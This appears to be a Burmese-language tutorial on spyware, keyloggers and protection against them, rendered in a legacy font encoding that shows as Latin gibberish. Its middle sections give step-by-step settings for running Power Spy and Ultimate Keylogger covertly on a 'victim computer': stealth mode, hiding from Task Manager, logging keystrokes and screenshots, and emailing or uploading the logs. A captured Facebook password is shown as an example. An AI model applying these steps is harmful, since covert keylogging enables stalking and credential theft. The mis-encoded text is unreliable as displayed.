uRefawmfwdkY&JU uGefysLwmpepfrSm 0ifa&muf ae&m,lMuwmjzpfygw,f/
uRefawmfwdkY aeYpOf toHk;jyKaeus website awGxJu
tawmfrsm;rsm;onf cookies awGudk install jyKvkyfavh&SdMuygw,f/ Oyrm -
Facebook aygh/ cookie qdkwmu website wpfckudk aemufwpfBudrf uRefawmfwdkY
jyefoHk;wJhtcg tqifajyvG,fulapzdkYtwGuf uRefawmfwdkY&JU Login information
awG? preference awGeJY tjcm;aom personal data awGudk odkavSmifodrf;qnf;
xm;EdkifzdkY twGuf Website uae uGefysLwmtwGif; xnfhoGif;ay;xm;wJh zdkifwpfrsdK;
jzpfygw,f/ ydkem;vnfatmif ajym&&if uRefawmfwdkYawG Login 0ifvdkufwm
Facebook rSm qdkygpdkY/ facebook.com udk wpfBudrf 0ifa&mufxm;jyD; Log out
rvkyfrcsif; tBudrfBudrf jyefzGifhoHk;vnf; Login jyef0ifp&m rvdkatmif tqdkyg
cookie awGu pGrf;aqmifay;ygw,f/ 'gaMumifh cookie awGonf uRefawmfwdkY&JU
online activity awGeJY ywfoufjyD; information awGudk pkaqmif;Edkifygw,f/
tcsdKUaom software awGrSmqdk&if xkwfvkyfolxH error report awG
jyefvnfay;ydkYEdkifapzdkYtwGuf toHk;jyKxm;wmrsdK;awG awGYEdkifygw,f/ unknown
extension awGeJY infection awGudk od&SdEdkifzdkYtwGuf report vkyf&mrSmvnf; cookie
awGudk toHk;jyKMuygw,f/ 'gaMumifh cookie yg0ifwJh application & site
rsm;rSmvnf; spyware awGeJY wlnDwJh Characteristic awG &SdMuygw,f/ 'gayr,fh
olwdkYu spyware awGawmh r[kwfMuygbl;/ tracking software vdkYawmh
qdkEdkifygw,f/
uRefawmfwdkYtaeeJY Application awGudk install wJhtcg user agreement
awGudk awGYzl;Muygvdrfhr,f/ 'gayr,fh uRefawmfwdkY zwfrMunfhjzpfbJ
ausmfvdkufwm rsm;ygw,f/ Tracking software awGonf olwdkY&JU user agreement
awGrSm olwdkY tracking vkyfaqmifr,fhtydkif; awGudk aocsmpGm azmfjy
xm;avh&Sdygw,f/ zkef;rSm toHk;jyKwJh application awGudk Munfh&ifvnf; install
wJhtcg tqdkyg application u camera, call, SMS, Gallery, audio, wifi,
bluetooth, file location, ... pwJh access awGudk ,loHk;r,fqdkwm
azmfjyxm;ygw,f/ uRefawmfwdkYawGu application awGudk owdrxm;bJ install
vdkufMuwmygyJ/ 'gaMumifh zkef;awGuaewpfqifh tcsuftvuf aygufMum;rIawG
jzpfvmMuovdk zkef;xJrSm odrf;xm;wJh Movie awG aygufMum;oGm;wmrsdK;awG
jzpfvmwmrsdK;awG jzpfvmygawmhw,f/
Facebook wdkYvdk Social Media application awGu Camera access
awmif;cHwmonf uRefawmfwdkY facebook oHk;wJhtcg yHkawG &dkufwifzdkY? AD'D,dkawG
&dkufwifEdkif Live vTifhEdkifzdkY jzpfygw,f/ 'gayr,fh zkef;udkayghatmif rvdkwmawG
&Sif;ay;w,f qdkwJh application awGrSm camera access udk awmif;cHwmrsdK;uawmh
'g[m r&dk;om;wJh tBuHtpnfvdkY qdk&rSmjzpfygw,f/ owdxm;&r,fhtxJrSm Free
app awGuawmh xdyfqHk;uae &Sdaeygw,f/
Child monitoring software awGvdk w&m;0if software awGvnf;
&Sdygao;w,f/ Oyrmwpfckajym&&if Trend Micro Titanium Maximum Security
program vdkrsdK;aygh/ olYrSm rdom;pk wpfpkvHk;pmtwGuf owfrSwfxm;EdkifwJh section
awG yg0ifygw,f/ olu rdom;pkxJrSm uav;awG &Sdae&if xdkuav;awGudk
roifhawmfwJh website awG Munfh&Iwm wdkY? tcsdKUaom vkyfief;oHk; program awGudk
zGifhrMunfhEdkifatmif ydwfxm;wm wdkY? tifwmeuf toHk;jyKwJh tcsdefudk
uefYowfay;wmwdkY pwJh vkyfaqmifcsufawGudk vkyfaqmifEdkifygw,f/ uav;awG
tifwmeufoHk;jyD; bmawGvkyfw,fqdkwmudk rdbawGqD report ay;wmaMumifh
rdbawGtaeeJY wpfaeukef apmifhMunfhaep&m rvdkawmhbl;aygh/ 'ghjyif uav;awG
udkvnf; online predator awG&JU &efuae umuG,fay;EdkifOD;rSm jzpfygw,f/
'gayr,fh w&m;r0if spyware awGuawmh uRefawmfwdkYudk today;jyD; 0ifa&muf
vmwmrsdK; r[kwfwJhtjyif rnfonfh agreement udkrQ jyorSm r[kwfygbl;/

Spyware Distribution
Spyware awG b,fvdk ysHUyGm;MuvJ/ tifwmeuf toHk;jyKrI ydkrdk wGifus,f
vmwmeJYtrQ spyware awG ysHUyGm;rIvnf; ydkrdkrsm;jym;vmMuygw,f/ Spyware
trsm;pkonf free download &,lvdkufwJh software awG? Legitimate site u
r[kwfbJ crack xm;jyD; jyefjzefYay;wJh application awGuae wpfqifh t"du ysHUESHY
Muygw,f/ Freeware awG? Shareware awGudk uRefawmfwdkY &SmazG toHk;jyKwwf
MuwmaMumifh xdkxJrSm spyware awG xnfhoGif;jyD; tcrJh wifay;wmawGudk
a'gif;,l &if;eJY uRefawmfwdkY&JU pepfxJudk spyware awG a&muf&SdvmMuygw,f/
'Dvdk Free software awGudk develop vkyfcJhwJh Programmer awGonf 'D
Free software awGuae 0ifaiG r&MuygbJvsuf tcsdefwdkif; topfawG
zefwD;xkwfay;aeEdkifwm bmaMumifhygvJ/ olwdkYu uRefawmfwdkY&JU information
awGudk pkaqmif;&,ljyD; uRefawmfwdkY&JU tcsuftvufawGudk aMumfjimolawGxH
jyefvnf a&mif;csjcif;jzifh 0ifaiG&Muygw,f/ application xJrSm aMumfjimawG
xnfhoGif;jcif;tm;jzifhvnf; 0ifaiG&Muygw,f/ 'ghjyif uRefawmfwdkY&JU Bank
Account vdk? Credit card eHygwfawGvdk pwJh tcsufawGudkawmifrS &,ltoHk;jyK
EdkifzdkY BudK;pm;EdkifMuygw,f/ 'D Freeware awG? shareware awGtjyif w&m;r0if
yGm;,l zefwD;xm;wJh Pirate Bay vdk Torrent awGu Movie awG? oDcsif;awG?
application awG? Game awG pwmawGuaevnf; jyefYyGm;EdkifMuygw,f/
bmaMumifhvJqdk&if xdkzdkifawGxJrSm spyware awG yg0ifaevdkYygyJ/
Spyware awGudk installation jyKvkyfwJh websites awGvnf;
&Sdaeygao;w,f/ pornography sites (18+ sites) awG? gambling site eJY Online
Hacking vkyfvdkY&w,fvdkY qdkxm;wJh tcsdKUaom site awGyg/ aemufjyD;
oifhpufxJrSm virus awG &SdaeygjyD 'D software udk tcrJh &,ljyD; install vkyfjcif;jzifh
&Sif;Edkifygr,f qdkwJh site awG? oifhpufu av;aewJhtwGuf rvdktyfwmawGudk
&Sif;vdkufyg qdkjyD; install cdkif;wJh site awG? pwJh site awGudk uRefawmfwdkY
a&mufoGm;jyD; vkyfMunfhrdvdkufjyDqkd&ifawmh uRefawmfwdkY&JU pepfxJudk spyware awG
jznfhoGif;oGm;wmudk cHvdkuf&rSmygyJ/
tqdkyg website rsdK;awGu 'DaeYacwfrSm awGY&qHk;aom yHkpHawG jzpfjyD;
spyware awGudk uRefawmfwdkYudk today;jcif; tvsOf;r&SdbJ xnfhoGif;oGm;wm
jzpfygw,f/ aemufwpfcku Pop-up windows awGudk toHk;jyKwJh link awG? plug-in
(or) extension awGuvnf; spyware awGudk jyefYyGm;apEdkifygw,f/
 txufyg yHkawGxJuvdk pop-up awG eJY web page awGudk uRefawmfwdkY
awGYBuHKzl;Muygvdrfhr,f/ 'gawGudk awGYrdwJhtcg ]]wu,frsm; uRefawmfwdkY pufudk
&Sif;vif;zdkY vdkjyDvm;}} qdkwmrsdK; uRefawmfwdkY awG;rdEdkifygw,f/ 'gawGonf
w&m;0if r[kwfygbl;/ 'gawGu uRefawmfwdkYpufxJudk wu,fh spyware awGudk
xnfhoGif;oGm;rSmjzpfygw,f/ uRefawmfwdkYrSm security knowledge r&Sdxm;&if
pufxJrSm&SdwJh virus awGudk &Sif;EdkifzdkY qdkjyD; spyware awGudk uRefawmfwdkYu
aysmfaysmf&Tif&TifyJ xnfhoGif;rdrSmyg/
Spyware awGudk &SmazG azmfxkwfay;wmu Anti-spyware
awGjzpfygw,f/ anti-spyware awG&JU vkyfaqmifcsufawGuvnf; pdwf0ifpm;zG,f
aumif;ygw,f/ spyware awG ysHUESHUapwJh enf;vrf;awGxJrSm pear-to-pear
distribution awG? cracked software awG? freeware/shareware awG? web browser
rSm uRefawmfwdkY xnfhoGif;toHk;jyKavh&SdMuwJh toolbar awG pwmawGuae wpfqifh
ysHUESHUjcif; awG yg0ifygw,f/ ]]&kyf&Sif&HkrSm ck &HkwifaewJhum; udk cdk;&dkufjyD;
jyefwifay;xm;wm ighrSm&Sdw,f/ rif;vdkcsif&if ul;oGm;}} qdkwmrsdK; uRefawmfwdkY
BuHKzl;aumif; BuHKzl;rSmyg/ tqdkyg Zmwfum;udk b,fu&wmvdkY xifygovJ/ Pirate
Bay wdkYvdk virus full jzpfaewJh torrent site awGuae &&Sdvmwm jzpfygw,f/
uRefawmfwdkY todrdwfaqGawGxJu oHk;wJh uGefysLwmawGrSm search
engine tool bar awGudk rsm;pGm install vkyfxm;wmrsdK; awGYzl;Edkifygw,f/ Microsoft,
Mozila eJY Google Chrome wdkYuae approve vkyfrxm;wJh rnfonfh search
engine toolbar udkrQ toHk;rjyKoifhygbl;/ bmvdkYvJqdk&if olwdkYu spyware awG
rdkYygyJ/ (tcsdKUu roHk;ayr,fh tjrifqef;wmaMumifh wrifudk wifxm;avh
&SdMuygw,f)/ spyware awGonf uRefawmfwdkY&JU pepfxJrSm hidden taeeJY
0ifa&mufaewwfjyD; uRefawmfwdkY&JU tcsuftvufawG? activity awGudk owner
(hacker) xH jyefvnf ay;ydkYaew,fqdkwmudk uRefawmfwdkY owdxm;&rSmyg/
aemufuG,frSm run aew,f qdkayr,fh spyware awGonf uRefawmfwdkY
uGefysLwm&JU CPU, memory eJY internet connection bandwidth awGvdk resource
awGudk &,loHk;pGJEdkifw,fqdkwm odrSwfxm;&ygr,f/ spyware awGaMumifh system
crash awG jzpfyGm;apEdkifjyD; uRefawmfwdkY uGefysLwmawG av;oGm;wm wdkY?
yHkrSefvkyfaqmifrI awG odyfMumoGm;wmrsdK; jzpfjyD; tifwmeufoHk;wJhtcg zkef;rSm
vdkif;aumif;ygvsufeJY uGefysLwmrSm vdkif;odyfraumif;bJ Munfh& MumaewmrsdK;?
zkef;uae vTifhoHk;&if zkef;a'wmawG t&rf;wufwmrsdK; pwmawG jzpfwwfygw,f/
tcsdKUqdk uGefysLwmudk topfxyf0,fcsifpdwf ay:vmwJhtxd jzpfwwfygw,f/
wu,fawmh 'gawGu spyware awG&JU vTrf;rdk;cH&jcif;om jzpfygw,f/
Browser u home page awGudk ajymif;vJypfwmrsdK;? default search
engine udk ajymif;vJypfwmrsdK; pwmawG jzpfvmjyDqdk&ifvnf; spyware awG
&SdaejyDjzpfaMumif; od&SdEdkifygw,f/ spyware awGonf malicious software
awGxJrSm wpfpdwfwpfydkif;tjzpf yg0ifwwfwmrsdK; &Sdayr,fh 'guawmh
BuHK&cJygw,f/ tcsdKUaom software awGu uRefawmfwdkY&JU firewall eJY anti-virus
awGudk ydwfypfEdkifwmrsdK;? uninstall vkyfypfEdkifwmrsdK;awG vkyfaqmifEdkifjyD;awmh
web browser &JU Security setting udkyg ajymif;ypfEdkifygw,f/

Power Spy
Power Spy udkawmh ematrixsoft.com/download.php rSm aemufqHk;
Am;&Sif;udk &,lEdkifygw,f/ windows 8, 8.1 eJY windows 10 awGygrSm toHk;jyKEdkifzdkY
xkwfvkyfxm;jyD; w&m;0if tracking software trsdK;tpm;wpfrsdK; jzpfygw,f/
Hacker BuD;awGuawmh spyware awGudk 100% control vkyfEdkifzdkYtwGuf udk,fydkif
yJ zefwD;toHk;jyKavhh&SdMuygw,f/ 'gayr,fh Programming Language awGudk
aocsm em;vnfjyD; Program awG a&;qGJEdkifzdkY vdktyfrSmjzpfygw,f/
uRefawmfwdkYuawmh ckrS pwifavhvmrSmjzpfvdkY &SdjyD;om; Software
av;awGudkyJ ,loHk;Mu&atmifcifAs/

yxrqHk; install jyD; run vdkufwJhtcg password owfrSwfay;zdkY

vdktyfrSmjzpfygw,f/ Password jznfhoGif;jyD; Submit vdkufyg/ jyD;&ifawmh Login
0ifzdkYtaMumif; azmfjywJhae&mav;awGYygr,f/

cke owfrSwfcJhwJh Password udk jyefvnf jznfhoGif;jyD; submit vdkuf&if

&ygjyD/
 user name eJY unlock code u 0,f,loHk;wJholawGtwGufom
jzpfygw,f/ uRefawmfwdkYu tcrJh version udk oHk;rSmjzpfvdkY later eJYyJ
qufvdkuf&ygr,f/

bmawGvkyfaqmifEdkifrvJqdkwmudk 'Dae&muae wpfcgwnf;

Munfh&IEdkifygw,f/ pwifr,fqdk&ifawmh Start monitoring udk ESdyfvdkuf&HkygyJ/
'DjrifuGif;udk azsmufxm;csif&ifawmh Stealth Mode udk ESdyfvdkuf&ygr,f/
jyefazmfwJhtcg Ctrl + Alt + X eJY jyefazmf&rSmjzpfjyD; rdrduGefysLwmrSm X cvkwfu
taMumif;aMumif;aMumifh tqifrajy&ifawmh Configuration rSm jyifqif
owfrSwfEdkifygw,f/ ckawmh Stealth Mode eJY udk,fa,mifazsmufvdkuf&atmif/
uRefawmfwdkY&JU Desktop jrifuGif;rSm Control Box aysmufoGm;ayr,fh
tm;enf;csufwpfcktaeeJY Desktop &JU nmbufjcrf;rSmawmh Monitor by qdkwmBuD;
&SdaerSmjzpfygw,f/

'gudk azsmufxm;csif&ifawmh uRefawmfwdkYtaeeJY Free Version udk

toHk;jyKvdkY r&ygbl;/ 0,fjyD;oHk;rSom &rSmjzpfygw,f/ One time use (Online Base)
jzpfum wpfBudrf install &eftwGuf US$ 50 cefY ay;&rSmjzpfygw,f/ uninstall
rvkyfrcsif; toHk;jyKEdkifrSmjzpfjyD; One Time Code jzpfwmaMumifh aemufxyf
pufwpfvHk;rSmawmh toHk;jyKvdkY r&Edkifygbl;/ xyf0,f&rSmyg/ 'gayr,fhvdkY
uRefawmfwdkYqDrSmawmh Monitored by POWER SPY qdkwmudk bmrSef;rodwJh
olawG rsm;pGm &SdaewmaMumifh toHk;jyKvdkY &ygw,f/ uRefawmfwdkY&JU udk,fydkif
uGefysLwmawGrSmvnf; ay:wif install xm;vdkY &ygw,f/ :)

jyefMunfhvdkwJhtcgrSmawmh Ctrl + Alt + X eJY jyefazmfjyD; stop monitoring

udk t&if click &ygr,f/ jyD;&ifawmh rdrdESpfouf&mudk a&G;cs,f MunfhEdkifygjyD/
Screenshot rSmvnf; uRefawmfwdkY toHk;jyKcJhwJh screen ay:u ajymif;vJrIawGudk
Screenshot &dkuf rSwfxm;wm jrif&rSmjzpfjyD; wpfyHkpD zGifhMunfhjcif;jzifh bmawG
vkyfaqmifxm;vJqdkwm odEdkifygao;w,f/ Keystrokes rSmawmh uRefawmfwdkY
uGefysLwmrSm toHk;jyK &dkufxnfhvdkufwJh key wdkif;udk rSwfxm;jyD; xdkxJuae
rdrdwdkYtwGuf toHk;0ifwJh Key word awGudk &&SdEdkifygw,f/

OyrmtaeeJY Browser rSm facebook.com rSm 0ifxm;wJh pmaMumif;udk

MunfhEdkifygw,f/ Facebook oHk;zdkYtwGuf uRefawmf 0ifa&mufvdkufwJh user
(hakhakhak) vdkY awGY&rSmyg/ Password u woewoewoe vdkY &dkufxnfhxm;wmudk
rSwfwrff;wifxm;Edkifygw,f/ Clipboard rSmawmh uRefawmfhuGefysLwmtwGif;rSm
aumfyDul;cJhwmawGudk jyrSmjzpfjyD; application rSmawmh monitoring
vkyfaepOftwGif;rSm zGifhoHk;cJhwJh application awGudk tBudrfa&t&yg
jrifEdkifygw,f/ Power Spy udk Start monitoring vkyfxm;pOftwGif;rSm
uGefysLwmudk restart vkyfvnf; &yfwefYoGm;rSmr[kwfvdkY rzrf;rdbJ vGwfoGm;rSm
ryl&ygbl;/ 'Davmufqdk&ifawmh b,fvdk toHk;jyK&rvJqdkwmudk
em;vnfavmufjyDvdkY ,lqygw,f/
'guawmh w&m;0iftaeeJY oHk;vdkY&wJh Legitimate software wpfckudk
aqG;aEG;cJhwmyg/ w&m;r0if software awGuawmh uRefawmfwdkYqDu ckerlemjywJh
Power Spy uae pkaqmif;vdkufwJh Data awGvdk ta&;ygwJhtcsuftvufawGudk
Malicious server wpfckqD ay;ydkYaeygw,f/ 'gaMumifh uRefawmfwdkY&JU vkyfief;cGif
twGif;rSm Spyware awG&JU &efuae vGwfajrmufatmif vkyfaqmifp&mawG
vkyfaqmifzdkY vdktyfygw,f/ (umuG,fa&;taMumif; qufaqG;aEG;oGm;ygr,f)

Keyloggers
'Dcgawmh Keylogger awG taMumif;aygh/ uRefawmfwdkY uGefysLwmrSm
&dkufoGif;vdkufwJh pmvHk;awG? aumfyDul;,lvdkufwJh pmvHk;awGudk rSwfom;xm;EdkifzdkY
Keylogger awGudk toHk;jyKMuw,fqdkwmudk a&S;uwnf;u uRefawmfwdkY odcJhMujyD;
jzpfygw,f/ jyD;cJhwJh Power Spy rSmvnf; Keystroke awGudk rSwfom;wJhtydkif;
ygcJhjyD;jyDaygh/ Keylogger &JU t"du wm0efonf Keyboard uae &dkufoGif;vdkufwJh
Key awGudk rSwfom;xm;zdkY jzpfygw,f/
'gaMumifh Keylogger onf uRefawmfwdkY&dkufoGif;vdkufwJh keystroke
awGudk txt zdkifwpfckeJY odrf;qnf;wJh tvkyfudk vkyfaqmifygw,f/ 'ghjyif Power
Spy vdk spyware wpfrsdK;rsdK;eJYvnf; aygif;pyfvkyfaqmifEdkifygao;w,f/ tJvdk
aygif;pyf vkyfaqmifEdkifjyDqdk&ifawmh attacker xH information awGudk
jyefay;ydkYwmrsdK;awGxd vkyfaqmifEdkifrSmjzpfygw,f/ hacker awGonf
uRefawmfwdkY&JU Bank account information, user & password vdk information
awGudk ydkrdkpdwf0ifpm;MuwmaMumifh Browser udk pzGifhpOfuae Browser ydwfvdkuf
csdef txdom rSwfom;xm;apzdkYudkvnf; program vkyfxm;vdkY &ygao;w,f/
'Dawmh Keylogger qdkwmonf uRefawmfwdkY&JU uGefysLwm keyboard eJY Operating
System Mum;rSm tvkyfvkyfwJh vkyfief;pOfwpfckvdkY jrifEdkifygw,f/
Hardware Keyloggers
uRefawmfwdkY odxm;wJh Keylogger awGonf software vnf; jzpfEdkifovdk
hardware vnf; jzpfaeEdkifygw,f/ Keyboard eJY computer eJY qufoG,fwJhMum;rSm
Mum;cH toHk;jyK&wmaMumifh Hardware Keylogger awGudk jrifawGYEdkifzdkY
vG,fulygw,f/ 'gayr,fh Desktop uGefysLwmawGrSmawmh USB port awGu
taemufbufrSm jzpfwmaMumifh 'Dwdkif;Munfh&HkeJYawmh odEdkifzdkY rvG,fygbl;/

Keyboard BudK;vGwfvdkY MunfhovdkvdkeJY MunfhMunfh&if hardware

keylogger &Sd r&Sdudk od&SdEdkifygw,f/ Hardware Keylogger awG&JU tm;enf;csufu
jrifomw,f/ jyD;awmh keyboard uae &dkufxnfhwmr[kwf&if od&SdEdkifjcif;
r&Sdygbl;/ olY&JU tm;omcsufuawmh xdk Keylogger awGonf olwdkYxJrSmudku
memory yg&SdjyD; jzpfojzifh uGefysLwmxJrSm zdkifudk odrf;qnf;jcif; r&Sdyg/
'gaMumifhrdkYvdkY anti-spyware awG anti-virus uawGu olYudk rod&SdEdkifygbl;/

Wireless keylogger uawmh wireless keyboard eJY receiver Mum;rSm

jzpfay:wJh transferred packet awGudk zrf;,lpkaqmif;Edkifygw,f/ yHkpHrsdK;pHkeJY
&SdaeEdkifjyD; wireless keyboard awGudk toHk;jyKxm;wJh ae&mawGrSm owdxm;
oifhygw,f/ jzpfEdkif&ifawmh wired keyboard awGudkyJ toHk;jyKoifhygw,f/

Software Keyloggers
'guawmh uRefawmfwdkY tm;vHk;odjyD;om;jzpfvdkY txl;taxG
aqG;aEG;p&m rvdkavmufawmhygbl;/ oluawmh uRefawmfwdkYtaeeJY keyboard
uae &dkufoGif;vdkufwJh Keystroke awGomru &SdjyD;om;zdkifawGxJuae
ul;,lvdkufwJh copy to clipboard awGudkyg rSwfwrf;wifEdkifwmaMumifh ydkjyD;
owdxm;&rSmjzpfygw,f/ Hardware awGvdk jrifomxifom r&Sdjcif;uvnf;
olYtwGuf tm;omcsufwpf&yf jzpfaejyefygao;w,f/
Software keylogger yHkpHrsdK;pHkeJY &SdaeMuygw,f/ OS xJrSm wnf&SdaejyD;
aemufuG,fuae vkyfaqmifEdkifwJh hypervisor-based keylogger awGxJrSmawmh
VMware &JU E-S-X-i product eJY Microsoft &JU Hyper-V wdkYu xif&Sm;ygw,f/
Software keylogger awGxJrSmawmh Kernel-based software keylogger awGu
ydkjyD; aMumufp&maumif;ygw,f/ root (or) administrator access vdk privilege
awGudk &,ljyD; olYudk &SmazGrawGYEdkifatmif Operating System xJrSm
uG,f0Suf0ifa&muf aewJh keylogger trsdK;tpm; jzpfygw,f/
aemufxyf keylogger yHkpHwpfrsdK;uawmh API based keylogger
jzpfygw,f/ API qdkwm Application Programming Interface udk qdkvdkygw,f/
API Keylogger wpfrsdK;qdk&if BIOS uwpfqifh authentication vkyf&mrSmoHk;wJh
PIN eHygwfawGudkawmifrS rSwfom;xm;Edkifygw,f/ 'gaMumifh uRefawmfwdkY&JU
uGefysLwmudk power on zdkYtwGuf toHk;jyK&r,fh key awGudk hacker awGu
od&SdaeEdkifygw,f/
Form Grabbing Keylogger udkawmh Form wpfcku data awGudk
qGJ,lEdkifzdkYyJ &dk;&Sif;pGm xkwfxm;ygw,f/ olu uRefawmfwdkYawG oGm;a&mufvnfywf
cJhwJh website awGrSm&SdwJh Form awGrSm jznfhoGif;wmawGudk rSwfom;ygw,f/ Oyrm
- uRefawmfwdkYu Gmail (or) Facebook Account opf wpfck zGifhawmhr,fqdk&if
Form jznfhoGif;&ygw,f/ Login 0ifawmhr,f qdk&ifvnf; Login Form rSm
jznfhoGif;jyD;rS 0ifa&muf&ygw,f/ Hacker awGtwGufuawmh toHk;wnfhqHk;vdkY
qdk&rSmjzpfygw,f/ bmaMumifhvJqdkawmh olu user name & password vdk
ta&;ygwJh tcsuftvufawGudkom rSwfom;xm;rSmjzpfvdkY &Sm&vG,fuljyD;
tydkpmvHk;awGudkyg avSsmufMunfh&wmrsdK;uae vGwfuif;apEdkifygw,f/ hacker
awGtwGuf uRefawmfwdkY&JU Windows User Account Control udk ausmfjzwf&mrSm
ulnDay;EdkifwJh Memory injection-based keylogger awGvnf; &Sdao;jyD; xdkxJrSm
Trojan awGeJY wGJpyfxm;wJh Zeus eJY Spy Eye wdkYu emrnfBuD;ygw,f/
Ultimate Keylogger
www.ultimatekeylogger.com rSm download &,lEdkifygw,f/
ta&twGuf rsm;rsm;0,f,lavav aps;EIef;oufomavav jzpfjyD; w&m;0if
0,f,l toHk;jyKEdkifygw,f/ pwif toHk;jyKpOfrSm password owfrSwfay;&ygr,f/

t"du tydkif;awGu rsm;wmaMumifh wpfydkif;pDudk azmfjyay;oGm;ygr,f/

'Dtydkif;uawmh tm;vHk; odjyD;jzpfygw,f/ Start Monitoring eJY pwifjyD;

&yfwefYvdkygu Stop monitoring vdkuf&HkygyJ/ View options uvnf; &Sif;ygw,f/
 Log Applications u Application toHk;jyKwmawGudkyg rSwfxm;r,fvdkY
qdkvdkygw,f/ rvdktyf&if trSefjcpfav; jzKwfxm;Edkifygw,f/ Take Screenshot
every -- Minutes uawmh victim computer &JU Screenshot awGudk b,fESrdepf
wpfBudrf (odkYr[kwf) b,fESpuúefY wpfBudrf ponfjzifh owfrSwfay;zdkY jzpfygw,f/
rvdktyf&if jzKwfxm;Edkifygw,f/ Keyboard uae &dkufoGif;orQ
rSwfxm;rvm;qdkwmudk Log all typed Keystrokes eJY owfrSwfay;Edkifovdk
copy/paste vkyfwmawGudkyg rSwf rrSwf owfrSwfay;Edkifygao;w,f/ Log visited
websites' URLs uawmh victim zGifhMunfhcJhwJh Website awG&JU RUL awGudk
rSwfxm;ay;r,fh option jzpfygw,f/

Security ydkif;rSmawmh azsmufxm;wmudk jyefazmfr,fh Key udk

owfrSwfEdkifwmyg/ default twdkif;uawmh Ctrl+Alt+Shift+S jzpfygw,f/ S
udkom ajymif;vJEdkifjyD; usefwmawGudkawmh ajymif;vdkY r&ygbl;/ Enable Password
Protection uawmh Password toHk;jyKumuG,fxm;w,fvdkY qdkvdkygw,f/ Task
manager rSm zrf;rrdatmif Hide process from Task Manager uae
owfrSwfay;Edkifygw,f/ Program files awGxJrSm awGYroGm;zdkYtwGufawmh Hide
application program files udk trSefjcpfjcpfay;jyD; a&G;cs,fEdkifygw,f/ Change
Password uawmh password ajymif;vJzdkY jzpfygw,f/
 Banner ydkif;rSmawmh system notification area rSm jy rjy
owfrSwf&rSmjzpfjyD; rdepf^puúefY wdkif;rSm rdrdazmfjyapcsifwJh message udk
jyoatmif zefwD;ay;xm;Edkifygw,f/

tay:yHku uRefawmf erlemjyxm;ay;wm jzpfygw,f/ rdrd azmfjyvdk&mudk

a&;xm;Edkifygw,fcifAs/

Send Reports Options uawmh rSwfom;xm;wJh tcsuftvufawGudk

uRefawmfwdkYxH jyefvnf ay;ydkYapzdkYyg/ tJonfrSmawmh Same Network rSm
&SdaewJhtcgrSm Send to Local/Network folder udk a&G;cs,fEdkifjyD; Lan setting
awGudk jyifqifxm;Edkifygw,f/ Send by E-mail rSmawmh uRefawmfwdkYqD
ydkYay;&r,fh email address udk xnfhoGif;xm;Edkifygw,f/ Upload via FTP uawmh
FTP server xH upload wifay;rSmjzpfjyD; uRefawmfwdkYrSm FTP server access
&Sdxm;zdkY vdktyfygw,f/ jyD;&if Report udk every -- em&D^rdepf wdkif;rSm ay;ydkYEdkifzdkY
owfrSwfay;xm;Edkifygw,f/ Include Screenshots uawmh Screenshot awGudkyg
ay;ydkYygvdkY qdkvdkjyD; Clear log after sending uawmh uRefawmfwdkYxH jyefydkYjyD;wmeJY
wpfjydKifeufwnf; pufxJrSm rxm;bJ &Sif;vdkufvdkY qdkvdkwmyg/ uRefawmfwdkYqD
ydkYwhJtcg ZIP archive rSm password eJY ydkYay;vdkufapvdkygu Password protect
ZIP archive udk trSefjcpf jznfhxm;EdkifjyD; aemufu tuGufxJrSm password udk
jznfhoGif;&ygr,f/ usefwmawGuawmh oabmw&m;csif; wlwmrdkYvdkY raqG;aEG;
awmhygbl;cifAs/

Kernel Keyloggers
'Dtydkif;uawmh Software Keylogger trsdK;tpm;xJrSm yg0ifjyD;
ydkaMumufp&maumif;wJh Keylogger trsdK;tpm; jzpfygw,f/ 'DtrsdK;tpm;
Keylogger awGonf Kernel level rSm run wmjzpfvdkY input device aygif;pHku data
awGudk wdkuf&dkuf &,lEdkifygw,f/ A+ avhvmcJhzl;olawGqdk ydkjyD; em;vnfEdkif
ygw,f/ uRefawmfwdkYawG toHk;jyKaewJh OS awGwdkif;onf Hardware awGudk
xdef;csKyfwJh level jzpfwJh ring 0 udk control vkyfygw,f/ user awG&JU Operation
awGuawmh ring 3 rSm run wm jzpfygw,f/ Kernel Keylogger awGu ring 0 rSm
run ygw,f/ 'gaMumifhrdkYvdkY olY&JU vkyfaqmifcsufawGu ydkrdk vGwfvyfaejyD; hacker
xHodkYvnf; vGwfvyfpGm jyefvnf tpD&ifcHay;ydkYEdkifrSmjzpfygw,f/
bmaMumifhvJqdk&ifawmh Kernel level rSm run wm jzpfvdkY olYudk
Anti-virus awG? anti-spyware program awGuae &SmazGawGY&SdEdkifzdkY cufcJvdkY
jzpfygw,f/ Anti-virus (or) anti-spyware awGonf user level application
awGjzpfMujyD;awmh ring 3 rSm run ygw,f/ ring 0 udk &SmawGYEdkifpGrf; r&SdMuygbl;/
uRefawmfwdkYtaeeJY Keylogger awG&JU oabm vkyfaqmifyHkawGudk od&SdjyD jzpfvdkY
umuG,fEdkifzdkYtwGuf vkyfaqmif&rSmawGudk qufjyD; aqG;aEG;ygr,f/

Protecting Yourself
Keylogger awGonf malware BuD;awG&JU wpfpdwfwpfydkif;
jzpfw,fqdkwm uRefawmfwdkY arQmfrSef;xm;&ygr,f/ malware qdkwmu malicious
software udk ac:qdkwmjzpfjyD; Trojan or rootkit wpfrsdK;rsdK;vnf; jzpfaeEdkifygw,f/
Trojan qdkwm uRefawmfwdkYtaeeJY tusdK;&Sdr,fh wpfpHkwpf&mtjzpf [efaqmifjyD;
0ifa&mufvmwJhtrsdK;tpm; wpfck jzpfum uRefawmfwdkY&JU tcsuftvufawGudk
axmufvSrf; &,lEdkifzdkY Keylogger awGudk aygif;pyfxnfhoGif;xm;EdkifwJh spyware
wpfrsdK;vnf; jzpfygw,f/ rootkit qdkwmuawmh Kernel Keylogger awGvdkyJ user
awGtaeeJY odzdkYcufwJh Kernel xJrSm install xm;wJ software wpfckvdkY tMurf;zsif;
rSwfom;xm;Edkifygw,f/
Spyware awG jyefYyGm;MuovdkygyJ/ Keylogger awGonfvnf;
malicious code awG yg0ifaewJh website awGuaewpfqifh drive-by download
awGuae uRefawmfwdkY&JU system xJudk ul;pufavh&Sdygw,f/ 'gwifr[kwfao;bJ
uRefawmfwdkY yHkrSef0ifa&mufMunfhaeus website wpfckckudk malicious hacker
awGu xdef;csKyfjyifqifjyD; uRefawmfwdkY r&dyfrdatmif xnfhoGif;oGm;wmawG
uaevnf; ul;pufEdkifygw,f/ user awGtwGufuawmh 'gonf odyfBuD;rm;wJh
issue wpfck jzpfaeygw,f/ uRefawmfwdkYonf aeYpOfvdkvdk website awGudk
0ifa&muf Munfh&IaeMuygw,f/ Facebook onfvnf; website wpfck jzpfygw,f/
'gaMumifh pdwf0ifpm;p&m website link awGudk Facebook Post awGxJrSm
